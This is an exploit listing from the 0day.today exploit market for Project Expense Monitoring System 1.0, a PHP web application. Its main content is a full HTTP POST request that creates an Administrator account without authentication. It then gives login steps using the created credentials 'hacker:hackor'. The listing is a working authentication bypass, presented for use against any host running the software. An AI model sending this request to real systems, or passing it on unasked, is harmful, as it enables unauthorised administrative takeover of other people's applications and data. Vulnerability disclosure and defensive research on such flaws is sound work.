[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Project Expense Monitoring System 1.0 Authentication Bypass Vulnerability

Author
Richard Jones
Risk
[
Security Risk High
]
0day-ID
0day-ID-36050
Category
web applications
Date add
29-03-2021
Platform
php
# Exploit Title: Project expense Monitoring System | Create Admin Account Unauthorised
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/14001/project-expense-monitoring-system-project-php-source-code-2020.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14001&title=Project+Expense+Monitoring+System+Project+in+PHP+With+Source+Code+
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Steps:

1. Post to application (account create)

POST /pems/module/user/controller.php?action=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://TARGET
Connection: close
Upgrade-Insecure-Requests: 1

deptid=&name=hacker&deptid=&username=hax%40hax.com&deptid=&pass=hackor&type=Administrator&save=

2. Login at http://Target/pems/login.php with hacker:hackor as Admin with created account

#  0day.today [2024-11-15]  #